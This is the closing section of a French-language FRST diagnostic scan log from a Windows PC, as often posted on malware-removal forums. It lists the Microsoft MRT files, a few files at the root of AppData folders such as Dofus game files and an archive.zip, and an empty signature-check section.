2022-01-12 13:30 - 2019-12-24 01:30 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-01-12 13:28 - 2019-12-24 01:29 - 145765912 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
==================== Fichiers à la racine de certains dossiers ========
2021-05-18 18:12 - 2022-02-02 10:46 - 000000032 _____ () C:\Users\enzo3\AppData\Roaming\.machineId
2020-03-17 11:30 - 2020-03-17 11:30 - 000000113 _____ () C:\Users\enzo3\AppData\Roaming\D2Info0
2020-10-15 13:01 - 2020-10-15 13:01 - 000000067 _____ () C:\Users\enzo3\AppData\Roaming\debug.log
2020-03-17 11:30 - 2020-03-17 12:17 - 000000008 _____ () C:\Users\enzo3\AppData\Roaming\DofusAppId0_1
2022-01-03 10:56 - 2022-01-03 10:56 - 000005887 _____ () C:\Users\enzo3\AppData\Local\archive.zip
==================== SigCheck ============================
(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)
==================== Fin de FRST.txt ========================